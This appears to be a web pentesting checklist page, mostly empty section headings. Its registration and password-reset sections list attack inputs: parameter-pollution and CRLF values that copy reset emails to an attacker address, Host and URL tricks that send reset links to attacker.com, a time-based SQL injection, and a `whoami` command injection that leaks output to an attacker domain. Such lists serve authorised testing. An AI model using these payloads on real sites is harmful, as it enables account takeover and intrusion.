Pentesting Web Checklist V2

Recon phase

  • Large: a whole company with multiple domains

  • Medium: a single domain

  • Small: a single website

Large scope
Medium scope
Small scope
Network
Preparation
Information Gathering

User management

Registration
# Duplicate Registration - Check varying the email:
uppsercase
victim+1@mail.com
special characters in the email name (%00, %09, %20)
Put black characters after the email: victim@mail.com a
victim@mail.com@attacker.com
victim@attacker.com@mail.com
Authentication / Login page
Session / Cookie
Profile / Account details / Change password page
Forgot / Reset password
email=victim@mail.com&email=attacker@mail.com
email=victim@mail.com%0a%0dcc:attacker@mail.com
email=victim@mail.com%0a%0dbcc:attacker@mail.com
email=victim@mail.com,attacker@mail.com
email=victim@mail.com%20attacker@mail.com
email=victim@mail.com|attacker@mail.com
email=victim@mail.com:attacker@mail.com
email[]=victim@mail.com&email[]=attacker@mail.com
email=victim@mail.com%0ACc:attacker@mail.com%0ABcc:attacker@mail.com
victim&email=attacker@mail.com
email=victim@mail.com&password=Mysecurepass123!
{"email":["victim@mail.com","attacker@mail.com"]}
{"email":"victim@mail.com","email":"attacker@mail.com"}

POST https://attacker.com/resetpassword HTTP/1.1
POST @attacker.com/resetpassword HTTP/1.1
POST :@attacker.com/resetpassword HTTP/1.1
POST /resetpassword@attacker.com HTTP/1.1

email=victim@mail.com'+(select*from(select(sleep(20)))a)+'
email=hello@`whoami`.attacker.com
/resetpassword?%0d%0aHost:%20attacker.com
Input Handling
Error Handling
Application Logic

Other checks

Infrastructure
CAPTCHA
Security Headers
PreviousCheat sheetNextWeb Attacks

Last updated